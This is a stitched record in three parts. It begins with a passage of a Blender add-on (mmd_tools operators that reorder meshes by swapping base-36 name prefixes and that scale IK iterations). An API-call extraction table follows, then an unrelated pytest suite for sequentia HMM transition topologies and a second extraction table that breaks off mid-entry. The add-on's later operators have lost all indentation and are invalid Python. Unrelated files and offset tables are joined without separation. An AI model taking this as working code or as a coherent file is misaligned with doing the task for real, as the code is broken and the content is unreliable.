        prefix = base36.rjust(3, '0') + '_'
        matched = re.match(PREFIX_PATT, mesh.name)
        # Replace an existing prefix; otherwise prepend a fresh one.
        mesh.name = prefix + (matched.group('name') if matched else mesh.name)
def _swap_prefixes(mesh1, mesh2):
    """Swap the "NNN_" sort prefixes of two mesh names, leaving the base
    names in place (used to reorder meshes by renaming).

    Improvement: the original matched PREFIX_PATT against each name twice
    (four regex runs in total); each name is now matched exactly once.
    Both names are assumed to already carry a prefix (see
    _normalize_mesh_names).
    """
    m1 = re.match(PREFIX_PATT, mesh1.name)
    m2 = re.match(PREFIX_PATT, mesh2.name)
    mesh1.name = m2.group('prefix') + m1.group('name')
    mesh2.name = m1.group('prefix') + m2.group('name')
class MoveModelMeshUp(Operator):
    """Operator: move the active mesh one position up in the model's sort
    order by swapping its name prefix with the previous mesh's."""
    bl_idname = 'mmd_tools.move_mesh_up'
    bl_label = 'Move Model Mesh Up'
    bl_description = 'Moves the selected mesh up'
    bl_options = {'PRESET'}

    @classmethod
    def poll(cls, context):
        active = context.active_object
        return active and mmd_model.Model.findRoot(active)

    def execute(self, context):
        root = mmd_model.Model.findRoot(context.active_object)
        rig = mmd_model.Model(root)
        # Ensure every mesh carries a normalized NNN_ prefix first.
        _normalize_mesh_names(rig.meshes())
        try:
            current = context.scene.objects[root.mmd_root.active_mesh_index]
        except Exception:
            self.report({ 'ERROR' }, 'Mesh not found')
            return { 'CANCELLED' }
        # Decode the base-36 prefix (without the trailing '_') to find the
        # mesh's current position, then swap with its predecessor.
        prefix_str = re.match(PREFIX_PATT, current.name).group('prefix')[:-1]
        position = int(prefix_str, 36)
        previous = rig.findMeshByIndex(position - 1)
        if current and previous and current != previous:
            _swap_prefixes(current, previous)
        return { 'FINISHED' }
class MoveModelMeshDown(Operator):
bl_idname = 'mmd_tools.move_mesh_down'
bl_label = 'Move Model Mesh Down'
bl_description = 'Moves the selected mesh down'
bl_options = {'PRESET'}
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and mmd_model.Model.findRoot(obj)
def execute(self, context):
root = mmd_model.Model.findRoot(context.active_object)
rig = mmd_model.Model(root)
# First normalize the mesh names
_normalize_mesh_names(rig.meshes())
try:
current_mesh = context.scene.objects[root.mmd_root.active_mesh_index]
except Exception:
self.report({ 'ERROR' }, 'Mesh not found')
return { 'CANCELLED' }
# Find the next mesh
prefix = re.match(PREFIX_PATT, current_mesh.name).group('prefix')[:-1]
current_idx = int(prefix, 36)
next_mesh = rig.findMeshByIndex(current_idx + 1)
if current_mesh and next_mesh and current_mesh != next_mesh:
# Swap the prefixes
_swap_prefixes(current_mesh, next_mesh)
return { 'FINISHED' }
class ChangeMMDIKLoopFactor(Operator):
bl_idname = 'mmd_tools.change_mmd_ik_loop_factor'
bl_label = 'Change MMD IK Loop Factor'
bl_description = "Multiplier for all bones' IK iterations in Blender"
bl_options = {'PRESET'}
mmd_ik_loop_factor = bpy.props.IntProperty(
name='MMD IK Loop Factor',
description='Scaling factor of MMD IK loop',
min=1,
soft_max=10,
max=100,
options={'SKIP_SAVE'},
)
@classmethod
def poll(cls, context):
obj = context.active_object
return obj and obj.type == 'ARMATURE'
def invoke(self, context, event):
arm = context.active_object
self.mmd_ik_loop_factor = max(arm.get('mmd_ik_loop_factor', 1), 1)
vm = context.window_manager
return vm.invoke_props_dialog(self)
def execute(self, context):
arm = context.active_object
if '_RNA_UI' not in arm:
arm['_RNA_UI'] = {}
rna_ui = arm['_RNA_UI']
if 'mmd_ik_loop_factor' not in rna_ui:
rna_ui['mmd_ik_loop_factor'] = {}
prop = rna_ui['mmd_ik_loop_factor']
prop['min'] = 1
prop['soft_min'] = 1
prop['soft_max'] = 10
prop['max'] = 100
prop['description'] = 'Scaling factor of MMD IK loop'
old_factor = max(arm.get('mmd_ik_loop_factor', 1), 1)
new_factor = arm['mmd_ik_loop_factor'] = self.mmd_ik_loop_factor
for b in arm.pose.bones:
for c in b.constraints:
if c.type != 'IK':
continue
iterations = int(c.iterations * new_factor / old_factor)
self.report({ 'INFO' }, 'Update %s of %s: %d -> %d'%(c.name, b.name, c.iterations, iterations))
c.iterations = iterations
return { 'FINISHED' }
| [
"bpy.props.IntProperty",
"bpy.props.BoolProperty",
"mmd_tools.utils.separateByMaterials",
"mmd_tools.utils.clearUnusedMeshes",
"mmd_tools.core.model.Model",
"bpy.ops.mmd_tools.clear_temp_materials",
"bpy.ops.mmd_tools.clear_uv_morph_view",
"bpy.ops.object.select_all",
"mmd_tools.utils.int2base",
"... | [((2329, 2456), 'bpy.props.BoolProperty', 'bpy.props.BoolProperty', ([], {'name': '"""Clean Shape Keys"""', 'description': '"""Remove unused shape keys of separated objects"""', 'default': '(True)'}), "(name='Clean Shape Keys', description=\n 'Remove unused shape keys of separated objects', default=True)\n", (2351, 2456), False, 'import bpy\n'), ((11280, 11435), 'bpy.props.IntProperty', 'bpy.props.IntProperty', ([], {'name': '"""MMD IK Loop Factor"""', 'description': '"""Scaling factor of MMD IK loop"""', 'min': '(1)', 'soft_max': '(10)', 'max': '(100)', 'options': "{'SKIP_SAVE'}"}), "(name='MMD IK Loop Factor', description=\n 'Scaling factor of MMD IK loop', min=1, soft_max=10, max=100, options={\n 'SKIP_SAVE'})\n", (11301, 11435), False, 'import bpy\n'), ((2814, 2843), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (2838, 2843), True, 'from mmd_tools.core import model as mmd_model\n'), ((3303, 3333), 'mmd_tools.utils.separateByMaterials', 'utils.separateByMaterials', (['obj'], {}), '(obj)\n', (3328, 3333), False, 'from mmd_tools import utils\n'), ((4390, 4415), 'mmd_tools.utils.clearUnusedMeshes', 'utils.clearUnusedMeshes', ([], {}), '()\n', (4413, 4415), False, 'from mmd_tools import utils\n'), ((4840, 4869), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (4864, 4869), True, 'from mmd_tools.core import model as mmd_model\n'), ((5295, 5316), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (5310, 5316), True, 'from mmd_tools.core import model as mmd_model\n'), ((5404, 5448), 'bpy.ops.object.select_all', 'bpy.ops.object.select_all', ([], {'action': '"""DESELECT"""'}), "(action='DESELECT')\n", (5429, 5448), False, 'import bpy\n'), ((6365, 6421), 'mmd_tools.core.morph.FnMorph.storeShapeKeyOrder', 'FnMorph.storeShapeKeyOrder', (['active_mesh', 'shape_key_names'], {}), '(active_mesh, shape_key_names)\n', (6391, 6421), False, 'from 
mmd_tools.core.morph import FnMorph\n'), ((6509, 6530), 'bpy.ops.object.join', 'bpy.ops.object.join', ([], {}), '()\n', (6528, 6530), False, 'import bpy\n'), ((6745, 6770), 'mmd_tools.utils.clearUnusedMeshes', 'utils.clearUnusedMeshes', ([], {}), '()\n', (6768, 6770), False, 'from mmd_tools import utils\n'), ((7230, 7277), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['context.active_object'], {}), '(context.active_object)\n', (7254, 7277), True, 'from mmd_tools.core import model as mmd_model\n'), ((7292, 7313), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (7307, 7313), True, 'from mmd_tools.core import model as mmd_model\n'), ((8098, 8119), 'mmd_tools.utils.int2base', 'utils.int2base', (['i', '(36)'], {}), '(i, 36)\n', (8112, 8119), False, 'from mmd_tools import utils\n'), ((8181, 8210), 're.match', 're.match', (['PREFIX_PATT', 'm.name'], {}), '(PREFIX_PATT, m.name)\n', (8189, 8210), False, 'import re\n'), ((9097, 9144), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['context.active_object'], {}), '(context.active_object)\n', (9121, 9144), True, 'from mmd_tools.core import model as mmd_model\n'), ((9159, 9180), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (9174, 9180), True, 'from mmd_tools.core import model as mmd_model\n'), ((10248, 10295), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['context.active_object'], {}), '(context.active_object)\n', (10272, 10295), True, 'from mmd_tools.core import model as mmd_model\n'), ((10310, 10331), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (10325, 10331), True, 'from mmd_tools.core import model as mmd_model\n'), ((2914, 2954), 'bpy.ops.mmd_tools.clear_temp_materials', 'bpy.ops.mmd_tools.clear_temp_materials', ([], {}), '()\n', (2952, 2954), False, 'import bpy\n'), ((2967, 3006), 'bpy.ops.mmd_tools.clear_uv_morph_view', 'bpy.ops.mmd_tools.clear_uv_morph_view', 
([], {}), '()\n', (3004, 3006), False, 'import bpy\n'), ((3211, 3232), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (3226, 3232), True, 'from mmd_tools.core import model as mmd_model\n'), ((3380, 3416), 'bpy.ops.mmd_tools.clean_shape_keys', 'bpy.ops.mmd_tools.clean_shape_keys', ([], {}), '()\n', (3414, 3416), False, 'import bpy\n'), ((3452, 3473), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (3467, 3473), True, 'from mmd_tools.core import model as mmd_model\n'), ((5060, 5100), 'bpy.ops.mmd_tools.clear_temp_materials', 'bpy.ops.mmd_tools.clear_temp_materials', ([], {}), '()\n', (5098, 5100), False, 'import bpy\n'), ((5113, 5152), 'bpy.ops.mmd_tools.clear_uv_morph_view', 'bpy.ops.mmd_tools.clear_uv_morph_view', ([], {}), '()\n', (5150, 5152), False, 'import bpy\n'), ((7152, 7181), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (7176, 7181), True, 'from mmd_tools.core import model as mmd_model\n'), ((8390, 8423), 're.match', 're.match', (['PREFIX_PATT', 'mesh1.name'], {}), '(PREFIX_PATT, mesh1.name)\n', (8398, 8423), False, 'import re\n'), ((8457, 8490), 're.match', 're.match', (['PREFIX_PATT', 'mesh1.name'], {}), '(PREFIX_PATT, mesh1.name)\n', (8465, 8490), False, 'import re\n'), ((8524, 8557), 're.match', 're.match', (['PREFIX_PATT', 'mesh2.name'], {}), '(PREFIX_PATT, mesh2.name)\n', (8532, 8557), False, 'import re\n'), ((8591, 8624), 're.match', 're.match', (['PREFIX_PATT', 'mesh2.name'], {}), '(PREFIX_PATT, mesh2.name)\n', (8599, 8624), False, 'import re\n'), ((9019, 9048), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (9043, 9048), True, 'from mmd_tools.core import model as mmd_model\n'), ((10170, 10199), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['obj'], {}), '(obj)\n', (10194, 10199), True, 'from mmd_tools.core import model as mmd_model\n'), ((1384, 1417), 
'bpy.ops.object.shape_key_remove', 'bpy.ops.object.shape_key_remove', ([], {}), '()\n', (1415, 1417), False, 'import bpy\n'), ((6660, 6679), 'mmd_tools.core.morph.FnMorph', 'FnMorph', (['morph', 'rig'], {}), '(morph, rig)\n', (6667, 6679), False, 'from mmd_tools.core.morph import FnMorph\n'), ((7726, 7756), 'mmd_tools.core.model.Model.findRoot', 'mmd_model.Model.findRoot', (['mesh'], {}), '(mesh)\n', (7750, 7756), True, 'from mmd_tools.core import model as mmd_model\n'), ((3819, 3842), 'mmd_tools.utils.int2base', 'utils.int2base', (['idx', '(36)'], {}), '(idx, 36)\n', (3833, 3842), False, 'from mmd_tools import utils\n'), ((3934, 3966), 're.match', 're.match', (['PREFIX_PATT', 'mesh.name'], {}), '(PREFIX_PATT, mesh.name)\n', (3942, 3966), False, 'import re\n'), ((4314, 4335), 'mmd_tools.core.model.Model', 'mmd_model.Model', (['root'], {}), '(root)\n', (4329, 4335), True, 'from mmd_tools.core import model as mmd_model\n'), ((9527, 9567), 're.match', 're.match', (['PREFIX_PATT', 'current_mesh.name'], {}), '(PREFIX_PATT, current_mesh.name)\n', (9535, 9567), False, 'import re\n'), ((10674, 10714), 're.match', 're.match', (['PREFIX_PATT', 'current_mesh.name'], {}), '(PREFIX_PATT, current_mesh.name)\n', (10682, 10714), False, 'import re\n')] |
import pytest, warnings, numpy as np
from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology
from ....support import assert_equal, assert_all_equal, assert_distribution
# Set seed for reproducible randomness
seed = 0
np.random.seed(seed)
rng = np.random.RandomState(seed)
# ========= #
# _Topology #
# ========= #
# --------------------------- #
# _Topology.uniform_initial() #
# --------------------------- #
def test_uniform_initial_min():
"""Generate a uniform initial state distribution with the minimum number of states"""
topology = _Topology(n_states=1, random_state=rng)
initial = topology.uniform_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
1.
]))
def test_uniform_initial_small():
"""Generate a uniform initial state distribution with a few states"""
topology = _Topology(n_states=2, random_state=rng)
initial = topology.uniform_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.5, 0.5
]))
def test_uniform_initial_many():
"""Generate a uniform initial state distribution with many states"""
topology = _Topology(n_states=5, random_state=rng)
initial = topology.uniform_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.2, 0.2, 0.2, 0.2, 0.2
]))
# -------------------------- #
# _Topology.random_initial() #
# -------------------------- #
def test_random_initial_min():
"""Generate a random initial state distribution with minimal states"""
topology = _Topology(n_states=1, random_state=rng)
initial = topology.random_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
1.
]))
def test_random_initial_small():
"""Generate a random initial state distribution with few states"""
topology = _Topology(n_states=2, random_state=rng)
initial = topology.random_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.57633871, 0.42366129
]))
def test_random_initial_many():
"""Generate a random initial state distribution with many states"""
topology = _Topology(n_states=5, random_state=rng)
initial = topology.random_initial()
assert_distribution(initial)
assert_equal(initial, np.array([
0.15210286, 0.10647349, 0.20059295, 0.11120171, 0.42962898
]))
# ================== #
# _LeftRightTopology #
# ================== #
# ---------------------------------------- #
# _LeftRightTopology.uniform_transitions() #
# ---------------------------------------- #
def test_left_right_uniform_transitions_min():
"""Generate a uniform left-right transition matrix with minimal states"""
topology = _LeftRightTopology(n_states=1, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_left_right_uniform_transitions_small():
"""Generate a uniform left-right transition matrix with few states"""
topology = _LeftRightTopology(n_states=2, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5],
[0. , 1. ]
]))
def test_left_right_uniform_transitions_many():
"""Generate a uniform left-right transition matrix with many states"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.2, 0.2 , 0.2 , 0.2 , 0.2 ],
[0. , 0.25, 0.25 , 0.25 , 0.25 ],
[0. , 0. , 0.33333333, 0.33333333, 0.33333333],
[0. , 0. , 0. , 0.5 , 0.5 ] ,
[0. , 0. , 0. , 0. , 1. ]
]))
# --------------------------------------- #
# _LeftRightTopology.random_transitions() #
# --------------------------------------- #
def test_left_right_random_transitions_min():
"""Generate a random left-right transition matrix with minimal states"""
topology = _LeftRightTopology(n_states=1, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_left_right_random_transitions_small():
"""Generate a random left-right transition matrix with few states"""
topology = _LeftRightTopology(n_states=2, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.23561633, 0.76438367],
[0. , 1. ]
]))
def test_left_right_random_transitions_many():
"""Generate a random left-right transition matrix with many states"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.23169814, 0.71716356, 0.02033845, 0.02516204, 0.00563782],
[0. , 0.19474072, 0.16405008, 0.22228532, 0.41892388],
[0. , 0. , 0.42912755, 0.16545797, 0.40541448],
[0. , 0. , 0. , 0.109713 , 0.890287 ],
[0. , 0. , 0. , 0. , 1. ]
]))
# ----------------------------------------- #
# _LeftRightTopology.validate_transitions() #
# ----------------------------------------- #
def test_left_right_validate_transitions_invalid():
"""Validate an invalid left-right transition matrix"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = _ErgodicTopology(n_states=5, random_state=rng).random_transitions()
with pytest.raises(ValueError) as e:
topology.validate_transitions(transitions)
assert str(e.value) == 'Left-right transition matrix must be upper-triangular'
def test_left_right_validate_transitions_valid():
"""Validate a valid left-right transition matrix"""
topology = _LeftRightTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
topology.validate_transitions(transitions)
# -------------------------------------- #
# _ErgodicTopology.uniform_transitions() #
# -------------------------------------- #
def test_ergodic_uniform_transitions_min():
"""Generate a uniform ergodic transition matrix with minimal states"""
topology = _ErgodicTopology(n_states=1, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_ergodic_uniform_transitions_small():
"""Generate a uniform ergodic transition matrix with few states"""
topology = _ErgodicTopology(n_states=2, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5],
[0.5, 0.5]
]))
def test_ergodic_uniform_transitions_many():
"""Generate a uniform ergodic transition matrix with many states"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2],
[0.2, 0.2, 0.2, 0.2, 0.2]
]))
# ------------------------------------- #
# _ErgodicTopology.random_transitions() #
# ------------------------------------- #
def test_ergodic_random_transitions_min():
"""Generate a random ergodic transition matrix with minimal states"""
topology = _ErgodicTopology(n_states=1, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_ergodic_random_transitions_small():
"""Generate a random ergodic transition matrix with few states"""
topology = _ErgodicTopology(n_states=2, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.9474011 , 0.0525989 ],
[0.85567599, 0.14432401]
]))
def test_ergodic_random_transitions_many():
"""Generate a random ergodic transition matrix with many states"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.58715548, 0.14491542, 0.20980762, 0.00623944, 0.05188205],
[0.0840705 , 0.23055049, 0.08297536, 0.25124688, 0.35115677],
[0.02117615, 0.37664662, 0.26705912, 0.09851123, 0.23660688],
[0.01938041, 0.16853843, 0.52046123, 0.07535256, 0.21626737],
[0.04996846, 0.44545843, 0.12079423, 0.07154241, 0.31223646]
]))
# --------------------------------------- #
# _ErgodicTopology.validate_transitions() #
# --------------------------------------- #
def test_ergodic_validate_transitions_invalid():
"""Validate an invalid ergodic transition matrix"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = _LeftRightTopology(n_states=5, random_state=rng).random_transitions()
with pytest.warns(UserWarning):
topology.validate_transitions(transitions)
def test_ergodic_validate_transitions_valid():
"""Validate a valid ergodic transition matrix"""
topology = _ErgodicTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
topology.validate_transitions(transitions)
# =============== #
# _LinearTopology #
# =============== #
# ------------------------------------- #
# _LinearTopology.uniform_transitions() #
# ------------------------------------- #
def test_linear_uniform_transitions_min():
"""Generate a uniform linear transition matrix with minimal states"""
topology = _LinearTopology(n_states=1, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_linear_uniform_transitions_small():
"""Generate a uniform linear transition matrix with few states"""
topology = _LinearTopology(n_states=2, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5],
[0. , 1. ]
]))
def test_linear_uniform_transitions_many():
"""Generate a uniform linear transition matrix with many states"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = topology.uniform_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.5, 0.5, 0. , 0. , 0. ],
[0. , 0.5, 0.5, 0. , 0. ],
[0. , 0. , 0.5, 0.5, 0. ],
[0. , 0. , 0. , 0.5, 0.5],
[0. , 0. , 0. , 0. , 1. ]
]))
# ------------------------------------ #
# _LinearTopology.random_transitions() #
# ------------------------------------ #
def test_linear_random_transitions_min():
"""Generate a random linear transition matrix with minimal states"""
topology = _LinearTopology(n_states=1, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[1.]
]))
def test_linear_random_transitions_small():
"""Generate a random linear transition matrix with few states"""
topology = _LinearTopology(n_states=2, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.65157396, 0.34842604],
[0. , 1. ]
]))
def test_linear_random_transitions_many():
"""Generate a random linear transition matrix with many states"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
assert_distribution(transitions)
assert_equal(transitions, np.array([
[0.44455421, 0.55544579, 0. , 0. , 0. ],
[0. , 0.57553614, 0.42446386, 0. , 0. ],
[0. , 0. , 0.92014965, 0.07985035, 0. ],
[0. , 0. , 0. , 0.66790982, 0.33209018],
[0. , 0. , 0. , 0. , 1. ]
]))
# -------------------------------------- #
# _LinearTopology.validate_transitions() #
# -------------------------------------- #
def test_linear_validate_transitions_invalid():
"""Validate an invalid linear transition matrix"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = _ErgodicTopology(n_states=5, random_state=rng).random_transitions()
with pytest.raises(ValueError) as e:
topology.validate_transitions(transitions)
assert str(e.value) == 'Left-right transition matrix must be upper-triangular'
def test_linear_validate_transitions_valid():
"""Validate a valid linear transition matrix"""
topology = _LinearTopology(n_states=5, random_state=rng)
transitions = topology.random_transitions()
topology.validate_transitions(transitions) | [
"sequentia.classifiers._Topology",
"sequentia.classifiers._LinearTopology",
"pytest.warns",
"sequentia.classifiers._LeftRightTopology",
"numpy.array",
"pytest.raises",
"numpy.random.seed",
"numpy.random.RandomState",
"sequentia.classifiers._ErgodicTopology"
] | [((261, 281), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (275, 281), True, 'import pytest, warnings, numpy as np\n'), ((288, 315), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (309, 315), True, 'import pytest, warnings, numpy as np\n'), ((594, 633), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (603, 633), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((888, 927), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (897, 927), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((1186, 1225), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (1195, 1225), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((1593, 1632), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (1602, 1632), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((1882, 1921), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (1891, 1921), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((2191, 2230), 'sequentia.classifiers._Topology', '_Topology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (2200, 2230), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((2763, 2811), 
'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (2781, 2811), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((3099, 3147), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (3117, 3147), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((3461, 3509), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (3479, 3509), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((4202, 4250), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (4220, 4250), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((4535, 4583), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (4553, 4583), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((4922, 4970), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (4940, 4970), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((5720, 5768), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (5738, 5768), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, 
_ErgodicTopology, _LinearTopology\n'), ((6152, 6200), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (6170, 6200), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((6561, 6607), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (6577, 6607), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((6889, 6935), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (6905, 6935), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((7243, 7289), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (7259, 7289), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((7859, 7905), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (7875, 7905), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((8184, 8230), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (8200, 8230), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((8563, 8609), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (8579, 8609), False, 'from sequentia.classifiers import 
_Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((9347, 9393), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (9363, 9393), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((9685, 9731), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (9701, 9731), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((10148, 10193), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (10163, 10193), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((10473, 10518), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (10488, 10518), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((10824, 10869), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (10839, 10869), False, 'from 